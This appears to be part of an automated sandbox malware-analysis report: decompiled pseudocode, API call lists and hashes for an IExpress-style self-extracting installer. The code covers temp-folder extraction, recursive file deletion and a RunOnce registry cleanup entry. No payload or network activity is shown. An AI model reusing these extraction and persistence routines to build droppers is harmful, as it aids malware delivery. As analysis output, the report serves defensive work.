                              									if(( *0xa78d48 & 0x000000c0) == 0) {
                              										_t41 =  *0xa79a40; // 0x3, executed
                              										_t26 = E00A7256D(_t41); // executed
                              										_t44 = _t26;
                              									}
                              									_t22 =  *0xa78a24; // 0x0
                              									 *0xa79a44 = _t44;
                              									__eflags = _t22;
                              									if(_t22 != 0) {
                              										L26:
                              										__eflags =  *0xa78a38;
                              										if( *0xa78a38 == 0) {
                              											__eflags = _t22;
                              											if(__eflags == 0) {
                              												E00A74169(__eflags);
                              											}
                              										}
                              										_t12 = 1;
                              										goto L17;
                              									} else {
                              										__eflags =  *0xa79a30 - _t22; // 0x0
                              										if(__eflags != 0) {
                              											goto L26;
                              										}
                              										_t25 = E00A73BA2(); // executed
                              										__eflags = _t25;
                              										if(_t25 == 0) {
                              											goto L16;
                              										}
                              										_t22 =  *0xa78a24; // 0x0
                              										goto L26;
                              									}
                              								}
                              								_t27 = E00A73B26(_t40, _t44);
                              								__eflags = _t27;
                              								if(_t27 == 0) {
                              									goto L16;
                              								}
                              								goto L20;
                              							}
                              							_t43 = 0x4bc;
                              							E00A744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                              							 *0xa79124 = E00A76285();
                              							goto L16;
                              						}
                              						_t59 =  *0xa79a30 - _t44; // 0x0
                              						if(_t59 != 0) {
                              							goto L14;
                              						}
                              						_t30 = E00A7621E(); // executed
                              						if(_t30 == 0) {
                              							goto L16;
                              						}
                              						goto L14;
                              					}
                              				}
                              				_t49 =  *0xa78a24;
                              				if( *0xa78a24 != 0) {
                              					L4:
                              					_t34 = E00A73A3F(_t51);
                              					_t52 = _t34;
                              					if(_t34 == 0) {
                              						goto L16;
                              					}
                              					goto L5;
                              				}
                              				if(E00A751E5(_t49) == 0) {
                              					goto L16;
                              				}
                              				_t51 =  *0xa78a38;
                              				if( *0xa78a38 != 0) {
                              					goto L5;
                              				}
                              				goto L4;
                              			}





























                              APIs
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72F93
                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A72FB2
                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A72FC6
                              • DecryptFileA.ADVAPI32 ref: 00A72FE6
                              • FreeLibrary.KERNEL32(00000000), ref: 00A72FF8
                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7301C
                                • Part of subcall function 00A751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F4D,?,00000002,00000000), ref: 00A75201
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 2126469477-3023407756
                              • Opcode ID: 6c282042ea74dd37ce8d80a095b5194998f0a5b4a82ec5741ea3f9b2821b7e0f
                              • Instruction ID: 7bd2d7ddf03c94b80a5db2a5aff323aa9e90f4e6a280124c4666f25abdc17e14
                              • Opcode Fuzzy Hash: 6c282042ea74dd37ce8d80a095b5194998f0a5b4a82ec5741ea3f9b2821b7e0f
                              • Instruction Fuzzy Hash: 7F41D632A00205AADF30EBB19D4975B33A89B95791F12C576E90DC2191EF74CEC3DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 86%
                              			E00A72390(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v276;
                              				char _v280;
                              				char _v284;
                              				struct _WIN32_FIND_DATAA _v596;
                              				struct _WIN32_FIND_DATAA _v604;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t21;
                              				int _t36;
                              				void* _t46;
                              				void* _t62;
                              				void* _t63;
                              				CHAR* _t65;
                              				void* _t66;
                              				signed int _t67;
                              				signed int _t69;
                              
                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                              				_t21 =  *0xa78004; // 0x74742267
                              				_t22 = _t21 ^ _t69;
                              				_v8 = _t21 ^ _t69;
                              				_t65 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                              					L10:
                              					_pop(_t62);
                              					_pop(_t66);
                              					_pop(_t46);
                              					return E00A76CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                              				} else {
                              					E00A71680( &_v276, 0x104, __ecx);
                              					_t58 = 0x104;
                              					E00A716B3( &_v280, 0x104, "*");
                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                              					_t63 = _t22;
                              					if(_t63 == 0xffffffff) {
                              						goto L10;
                              					} else {
                              						goto L3;
                              					}
                              					do {
                              						L3:
                              						_t58 = 0x104;
                              						E00A71680( &_v276, 0x104, _t65);
                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                              							_t58 = 0x104;
                              							E00A716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                              							SetFileAttributesA( &_v280, 0x80);
                              							DeleteFileA( &_v280);
                              						} else {
                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                              								E00A716B3( &_v276, 0x104,  &(_v596.cFileName));
                              								_t58 = 0x104;
                              								E00A7658A( &_v280, 0x104, 0xa71140);
                              								E00A72390( &_v284);
                              							}
                              						}
                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                              					} while (_t36 != 0);
                              					FindClose(_t63); // executed
                              					_t22 = RemoveDirectoryA(_t65); // executed
                              					goto L10;
                              				}
                              			}






















                              APIs
                              • FindFirstFileA.KERNELBASE(?,00A78A3A,00A711F4,00A78A3A,00000000,?,?), ref: 00A723F6
                              • lstrcmpA.KERNEL32(?,00A711F8), ref: 00A72427
                              • lstrcmpA.KERNEL32(?,00A711FC), ref: 00A7243B
                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A72495
                              • DeleteFileA.KERNEL32(?), ref: 00A724A3
                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A724AF
                              • FindClose.KERNELBASE(00000000), ref: 00A724BE
                              • RemoveDirectoryA.KERNELBASE(00A78A3A), ref: 00A724C5
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: f967554708b6ae56b5b363b61fa90c37b93c973c32608f6d217f2cf8f76837d7
                              • Instruction ID: 00bd3635478d9a49dc931c6c598f39838739f0f4d4df473ab9f01a61261acd27
                              • Opcode Fuzzy Hash: f967554708b6ae56b5b363b61fa90c37b93c973c32608f6d217f2cf8f76837d7
                              • Instruction Fuzzy Hash: 9C318432604740ABD320EBA8CD89BEF73ECABC4315F04CD2DB55D86290EB34994AC752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E00A72BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t4;
                              				void* _t6;
                              				intOrPtr _t7;
                              				void* _t9;
                              				struct HINSTANCE__* _t12;
                              				intOrPtr* _t17;
                              				signed char _t19;
                              				intOrPtr* _t21;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t32;
                              
                              				_t4 = GetVersion();
                              				if(_t4 >= 0 && _t4 >= 6) {
                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                              					if(_t12 != 0) {
                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                              						if(_t21 != 0) {
                              							_t17 = _t21;
                              							 *0xa7a288(0, 1, 0, 0);
                              							 *_t21();
                              							_t29 = _t24 - _t24;
                              							if(_t24 != _t24) {
                              								_t17 = 4;
                              								asm("int 0x29");
                              							}
                              						}
                              					}
                              				}
                              				_t20 = _a12;
                              				_t18 = _a4;
                              				 *0xa79124 = 0;
                              				if(E00A72CAA(_a4, _a12, _t29, _t17) != 0) {
                              					_t9 = E00A72F1D(_t18, _t20); // executed
                              					_t22 = _t9; // executed
                              					E00A752B6(0, _t18, _t21, _t22); // executed
                              					if(_t22 != 0) {
                              						_t32 =  *0xa78a3a; // 0x0
                              						if(_t32 == 0) {
                              							_t19 =  *0xa79a2c; // 0x0
                              							if((_t19 & 0x00000001) != 0) {
                              								E00A71F90(_t19, _t21, _t22);
                              							}
                              						}
                              					}
                              				}
                              				_t6 =  *0xa78588; // 0x0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0xa79124; // 0x0
                              				return _t7;
                              			}



















                              APIs
                              • GetVersion.KERNEL32(?,00000002,00000000,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C03
                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C18
                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A72C28
                              • CloseHandle.KERNEL32(00000000,?,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C98
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseModuleProcVersion
                              • String ID: HeapSetInformation$Kernel32.dll
                              • API String ID: 62482547-3460614246
                              • Opcode ID: 5e6fa2ed29bcb1ab3081738405f8276a983bfa53fd6967a2ac3d24f29a6640a9
                              • Instruction ID: 2404c05a7d55bace50c4dbc912bb2a97bdebb78c70061bcfc1b470783b2dc2ac
                              • Opcode Fuzzy Hash: 5e6fa2ed29bcb1ab3081738405f8276a983bfa53fd6967a2ac3d24f29a6640a9
                              • Instruction Fuzzy Hash: 5D11E9313003056BD711ABF5AD49B6F3799DBA4391B14C535F90DD3251EA34DC8387A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A76F40() {
                              
                              				SetUnhandledExceptionFilter(E00A76EF0); // executed
                              				return 0;
                              			}




                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A76F45
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 5a9a7ae741fc2d728e4f27578409b390a91e87bf6f9b5947f014fe62754f2162
                              • Instruction ID: 9042eefac8166ed8de3ac5b70cecc3194e9f512426a983daf0fe23d561e65f6f
                              • Opcode Fuzzy Hash: 5a9a7ae741fc2d728e4f27578409b390a91e87bf6f9b5947f014fe62754f2162
                              • Instruction Fuzzy Hash: F290026425150067A6505BB09D1955976916A9D612BC1D960A019C4494DB6040819522
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 93%
                              			E00A7202A(struct HINSTANCE__* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				char _v528;
                              				void* _v532;
                              				int _v536;
                              				int _v540;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				long _t36;
                              				long _t41;
                              				struct HINSTANCE__* _t46;
                              				intOrPtr _t49;
                              				intOrPtr _t50;
                              				CHAR* _t54;
                              				void _t56;
                              				signed int _t66;
                              				intOrPtr* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t80;
                              				intOrPtr* _t81;
                              				void* _t86;
                              				void* _t87;
                              				void* _t90;
                              				_Unknown_base(*)()* _t91;
                              				signed int _t93;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t79 = __edx;
                              				_t28 =  *0xa78004; // 0x74742267
                              				_v8 = _t28 ^ _t93;
                              				_t84 = 0x104;
                              				memset( &_v268, 0, 0x104);
                              				memset( &_v528, 0, 0x104);
                              				_t95 = _t94 + 0x18;
                              				_t66 = 0;
                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                              				if(_t36 != 0) {
                              					L24:
                              					return E00A76CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                              				}
                              				_push(_t86);
                              				_t87 = 0;
                              				while(1) {
                              					E00A7171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                              					_t95 = _t95 + 0x10;
                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                              					if(_t41 != 0) {
                              						break;
                              					}
                              					_t87 = _t87 + 1;
                              					if(_t87 < 0xc8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				if(_t87 != 0xc8) {
                              					GetSystemDirectoryA( &_v528, _t84);
                              					_t79 = _t84;
                              					E00A7658A( &_v528, _t84, "advpack.dll");
                              					_t46 = LoadLibraryA( &_v528); // executed
                              					_t84 = _t46;
                              					if(_t84 == 0) {
                              						L10:
                              						if(GetModuleFileNameA( *0xa79a3c,  &_v268, 0x104) == 0) {
                              							L17:
                              							_t36 = RegCloseKey(_v532);
                              							L23:
                              							_pop(_t86);
                              							goto L24;
                              						}
                              						L11:
                              						_t72 =  &_v268;
                              						_t80 = _t72 + 1;
                              						do {
                              							_t49 =  *_t72;
                              							_t72 = _t72 + 1;
                              						} while (_t49 != 0);
                              						_t73 = _t72 - _t80;
                              						_t81 = 0xa791e4;
                              						do {
                              							_t50 =  *_t81;
                              							_t81 = _t81 + 1;
                              						} while (_t50 != 0);
                              						_t84 = _t73 + 0x50 + _t81 - 0xa791e5;
                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa791e5);
                              						if(_t90 != 0) {
                              							 *0xa78580 = _t66 ^ 0x00000001;
                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                              							if(_t66 == 0) {
                              								_t54 = "%s /D:%s";
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              							E00A7171E(_t90, _t84, _t54,  &_v268);
                              							_t75 = _t90;
                              							_t23 = _t75 + 1; // 0x1
                              							_t79 = _t23;
                              							do {
                              								_t56 =  *_t75;
                              								_t75 = _t75 + 1;
                              							} while (_t56 != 0);
                              							_t24 = _t75 - _t79 + 1; // 0x2
                              							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                              							RegCloseKey(_v532); // executed
                              							_t36 = LocalFree(_t90);
                              							goto L23;
                              						}
                              						_t79 = 0x4b5;
                              						E00A744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                              						goto L17;
                              					}
                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                              					_t66 = 0 | _t91 != 0x00000000;
                              					FreeLibrary(_t84); // executed
                              					if(_t91 == 0) {
                              						goto L10;
                              					}
                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              						E00A7658A( &_v268, 0x104, 0xa71140);
                              					}
                              					goto L11;
                              				}
                              				_t36 = RegCloseKey(_v532);
                              				 *0xa78530 = _t66;
                              				goto L23;
                              			}


































                              APIs
                              • memset.MSVCRT ref: 00A72050
                              • memset.MSVCRT ref: 00A7205F
                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A7208C
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A720C9
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A720EA
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72103
                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72122
                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A72134
                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72144
                              • GetSystemDirectoryA.KERNEL32 ref: 00A7215B
                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A7218C
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A721C1
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A721E4
                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A7223D
                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72249
                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72250
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                              • API String ID: 178549006-217856272
                              • Opcode ID: ea85b3032aba0309bb23e2fd54e04cc37353e49faacdcdba6453e0fa06a3a0cb
                              • Instruction ID: 8329a9c6ba4205f422b06ee3d849eb2d25f89bee0611d6234724bdea9fc366b8
                              • Opcode Fuzzy Hash: ea85b3032aba0309bb23e2fd54e04cc37353e49faacdcdba6453e0fa06a3a0cb
                              • Instruction Fuzzy Hash: 5451D571A40214BBDB20DB64DC4DFEB777CFB94700F00C6A8B94DE6151EA759E868BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 92%
                              			E00A755A0(void* __eflags) {
                              				signed int _v8;
                              				char _v265;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				int _t32;
                              				int _t33;
                              				int _t35;
                              				signed int _t36;
                              				signed int _t38;
                              				int _t40;
                              				int _t44;
                              				long _t48;
                              				int _t49;
                              				int _t50;
                              				signed int _t53;
                              				int _t54;
                              				int _t59;
                              				char _t60;
                              				int _t65;
                              				char _t66;
                              				int _t67;
                              				int _t68;
                              				int _t69;
                              				int _t70;
                              				int _t71;
                              				struct _SECURITY_ATTRIBUTES* _t72;
                              				int _t73;
                              				CHAR* _t82;
                              				CHAR* _t88;
                              				void* _t103;
                              				signed int _t110;
                              
                              				_t28 =  *0xa78004; // 0x74742267
                              				_v8 = _t28 ^ _t110;
                              				_t2 = E00A7468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                              				_t109 = LocalAlloc(0x40, _t2);
                              				if(_t109 != 0) {
                              					_t82 = "RUNPROGRAM";
                              					_t32 = E00A7468F(_t82, _t109, 1);
                              					__eflags = _t32;
                              					if(_t32 != 0) {
                              						_t33 = lstrcmpA(_t109, "<None>");
                              						__eflags = _t33;
                              						if(_t33 == 0) {
                              							 *0xa79a30 = 1;
                              						}
                              						LocalFree(_t109);
                              						_t35 =  *0xa78b3e; // 0x0
                              						__eflags = _t35;
                              						if(_t35 == 0) {
                              							__eflags =  *0xa78a24; // 0x0
                              							if(__eflags != 0) {
                              								L46:
                              								_t101 = 0x7d2;
                              								_t36 = E00A76517(_t82, 0x7d2, 0, E00A73210, 0, 0);
                              								asm("sbb eax, eax");
                              								_t38 =  ~( ~_t36);
                              							} else {
                              								__eflags =  *0xa79a30; // 0x0
                              								if(__eflags != 0) {
                              									goto L46;
                              								} else {
                              									_t109 = 0xa791e4;
                              									_t40 = GetTempPathA(0x104, 0xa791e4);
                              									__eflags = _t40;
                              									if(_t40 == 0) {
                              										L19:
                              										_push(_t82);
                              										E00A71781( &_v268, 0x104, _t82, "A:\\");
                              										__eflags = _v268 - 0x5a;
                              										if(_v268 <= 0x5a) {
                              											do {
                              												_t109 = GetDriveTypeA( &_v268);
                              												__eflags = _t109 - 6;
                              												if(_t109 == 6) {
                              													L22:
                              													_t48 = GetFileAttributesA( &_v268);
                              													__eflags = _t48 - 0xffffffff;
                              													if(_t48 != 0xffffffff) {
                              														goto L30;
                              													} else {
                              														goto L23;
                              													}
                              												} else {
                              													__eflags = _t109 - 3;
                              													if(_t109 != 3) {
                              														L23:
                              														__eflags = _t109 - 2;
                              														if(_t109 != 2) {
                              															L28:
                              															_t66 = _v268;
                              															goto L29;
                              														} else {
                              															_t66 = _v268;
                              															__eflags = _t66 - 0x41;
                              															if(_t66 == 0x41) {
                              																L29:
                              																_t60 = _t66 + 1;
                              																_v268 = _t60;
                              																goto L42;
                              															} else {
                              																__eflags = _t66 - 0x42;
                              																if(_t66 == 0x42) {
                              																	goto L29;
                              																} else {
                              																	_t68 = E00A76952( &_v268);
                              																	__eflags = _t68;
                              																	if(_t68 == 0) {
                              																		goto L28;
                              																	} else {
                              																		__eflags = _t68 - 0x19000;
                              																		if(_t68 >= 0x19000) {
                              																			L30:
                              																			_push(0);
                              																			_t103 = 3;
                              																			_t49 = E00A7597D( &_v268, _t103, 1);
                              																			__eflags = _t49;
                              																			if(_t49 != 0) {
                              																				L33:
                              																				_t50 = E00A72630(0,  &_v268, 1);
                              																				__eflags = _t50;
                              																				if(_t50 != 0) {
                              																					GetWindowsDirectoryA( &_v268, 0x104);
                              																				}
                              																				_t88 =  &_v268;
                              																				E00A7658A(_t88, 0x104, "msdownld.tmp");
                              																				_t53 = GetFileAttributesA( &_v268);
                              																				__eflags = _t53 - 0xffffffff;
                              																				if(_t53 != 0xffffffff) {
                              																					_t54 = _t53 & 0x00000010;
                              																					__eflags = _t54;
                              																				} else {
                              																					_t54 = CreateDirectoryA( &_v268, 0);
                              																				}
                              																				__eflags = _t54;
                              																				if(_t54 != 0) {
                              																					SetFileAttributesA( &_v268, 2);
                              																					_push(_t88);
                              																					_t109 = 0xa791e4;
                              																					E00A71781(0xa791e4, 0x104, _t88,  &_v268);
                              																					_t101 = 1;
                              																					_t59 = E00A75467(0xa791e4, 1, 0);
                              																					__eflags = _t59;
                              																					if(_t59 != 0) {
                              																						goto L45;
                              																					} else {
                              																						_t60 = _v268;
                              																						goto L42;
                              																					}
                              																				} else {
                              																					_t60 = _v268 + 1;
                              																					_v265 = 0;
                              																					_v268 = _t60;
                              																					goto L42;
                              																				}
                              																			} else {
                              																				_t65 = E00A72630(0,  &_v268, 1);
                              																				__eflags = _t65;
                              																				if(_t65 != 0) {
                              																					goto L28;
                              																				} else {
                              																					_t67 = E00A7597D( &_v268, 1, 1, 0);
                              																					__eflags = _t67;
                              																					if(_t67 == 0) {
                              																						goto L28;
                              																					} else {
                              																						goto L33;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			goto L28;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														goto L22;
                              													}
                              												}
                              												goto L47;
                              												L42:
                              												__eflags = _t60 - 0x5a;
                              											} while (_t60 <= 0x5a);
                              										}
                              										goto L43;
                              									} else {
                              										_t101 = 1;
                              										_t69 = E00A75467(0xa791e4, 1, 3); // executed
                              										__eflags = _t69;
                              										if(_t69 != 0) {
                              											goto L45;
                              										} else {
                              											_t82 = 0xa791e4;
                              											_t70 = E00A72630(0, 0xa791e4, 1);
                              											__eflags = _t70;
                              											if(_t70 != 0) {
                              												goto L19;
                              											} else {
                              												_t101 = 1;
                              												_t82 = 0xa791e4;
                              												_t71 = E00A75467(0xa791e4, 1, 1);
                              												__eflags = _t71;
                              												if(_t71 != 0) {
                              													goto L45;
                              												} else {
                              													do {
                              														goto L19;
                              														L43:
                              														GetWindowsDirectoryA( &_v268, 0x104);
                              														_push(4);
                              														_t101 = 3;
                              														_t82 =  &_v268;
                              														_t44 = E00A7597D(_t82, _t101, 1);
                              														__eflags = _t44;
                              													} while (_t44 != 0);
                              													goto L2;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							}
                              						} else {
                              							__eflags = _t35 - 0x5c;
                              							if(_t35 != 0x5c) {
                              								L10:
                              								_t72 = 1;
                              							} else {
                              								__eflags =  *0xa78b3f - _t35; // 0x0
                              								_t72 = 0;
                              								if(__eflags != 0) {
                              									goto L10;
                              								}
                              							}
                              							_t101 = 0;
                              							_t73 = E00A75467(0xa78b3e, 0, _t72);
                              							__eflags = _t73;
                              							if(_t73 != 0) {
                              								L45:
                              								_t38 = 1;
                              							} else {
                              								_t101 = 0x4be;
                              								E00A744B9(0, 0x4be, 0, 0, 0x10, 0);
                              								goto L2;
                              							}
                              						}
                              					} else {
                              						_t101 = 0x4b1;
                              						E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						LocalFree(_t109);
                              						 *0xa79124 = 0x80070714;
                              						goto L2;
                              					}
                              				} else {
                              					_t101 = 0x4b5;
                              					E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					 *0xa79124 = E00A76285();
                              					L2:
                              					_t38 = 0;
                              				}
                              				L47:
                              				return E00A76CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                              			}

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A755CF
                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A75638
                              • LocalFree.KERNEL32(00000000), ref: 00A7564C
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A75620
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
